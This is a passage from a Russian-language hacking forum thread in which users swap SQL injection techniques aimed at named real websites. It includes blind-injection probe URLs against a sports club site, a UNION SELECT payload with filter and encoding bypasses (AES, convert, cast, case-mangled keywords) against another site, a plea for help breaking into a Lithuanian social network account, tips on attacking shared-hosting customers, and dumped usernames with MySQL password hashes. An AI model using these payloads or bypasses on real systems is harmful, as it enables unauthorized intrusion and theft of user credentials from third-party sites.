Это слепая инъекция http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140+and+1=1 http://lokomotiv.yar.ru/media.aspx?media_act=show&tour_id=67&media_id=2140+and+1=0 MSSQL
Мерси, в догонку тогда вопрос, стандартные методы раскрутки такой инъекции есть? Или наугад "как ночью по тайге"?
Привет всем из далекой Литвы . Тут есть один сайт типа "друзья моих друзэй и.т.д" http://www.one.lt который что то трудновато взломать тут. Мне очень надо вернуть свой пасс . ник sfinxs15 . Ето сайт по моему полностью с куками управляется но что то тут никакой брутус непашет . Прошу помоши у всех кто как то смог бы его взломать если чe pishite . http://www.one.lt
Вопрос опять по SQL =) Вот есть SQL Инекция Code: http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,2,3,4/* Ну например ввожу я там version() и вместо того чтобы показать версию он мне в ответ вот что: Что это означает?)
2 CaNNabi$ нужно обойти фильтрацию держи: _http://www.petrovacnamoru.net/petrovac/kafe-barovi/?id=0x3127%20union+select+1,aes_decrypt(aes_encrypt(version(),0x71),0x71),3,4/*
2 Spyder Извиняюсь за неточность обход ошибок кодировки Функции AES_ENCRYPT() и AES_DECRYPT()- позволяют шифровать/дешифровать данные Сначала шифруем с заданным ключом потом расшифровываем.Результат выводится уже в правильной кодировке. так лучше?
нашел один сай sql... из mysql.user version() - 4.1.20 достал логины и шеши bla:*7E031FB695D422377447A5660A3B95FED283B260 bla:*7CDBD368F59FA498366CBEC09B7A5C2BAF06D045 потом пошли bla:3bb4472d333b8afa ...... потом снова такого вида bla:*7E031FB695D422355967A5660A3B95FED283B260 что это все значит
jokester нет. нахрена шифровать/дешифровать, если можно юзать нужную кодировку convert(version()+using+latin1)
вообще можно представить вывод функции в бинарном виде с помощьюфункции cast() так намного проще cast(version()+as+binary)
У меня такой вопрос,возможно ли провести sql инъекцию в сайтах бла.jino-net.ru, или нет? Спрашиваю потому что нираз не удавалось,в чем там загвоздка?
там все обычно. на каждом сайте выделяется одна бд под нужды юзера. соответственно, если на сайте есть уязвимые скрипты, можно провести инъекцию в эту бд.
Я понял,но хня заключается в том что кроме версии,юзера и бд,нифига не выходит,хотя версия муси 5 information_schema не пашет,мож там фильтрация стоит какая, как на хостинге спайсвеб на from?
Конечно не пашет! там не вильтрация, а ограничение прав. Те ж сказали, что даётся 1 БД на сайт. Значит всё просто, только столбцы нужно подобрать. А чтобы узнать имя БД - зарегай се аккаунт и посмотри. Вобщем проанализируй там всё. а фильтрации часто можно обходить так. Например, если слово from, то FrOm frFROMom. Но на джино нет фильтрации P.S. В разделе XSS я выладивал как активную, так и пассиивную.
и еще вопросик, что это за кодировка паролей : art:=Ы#џlu/њ$ ) volov:FШ bazin:VШЦб(¦ rozonova:NЕоА gaponov:VМВ/юШ malvina:з[^ anna:eЛдIн >(· ? что это не хеши я знаю,так как на другом сайте с этим движком пароли в открытом виде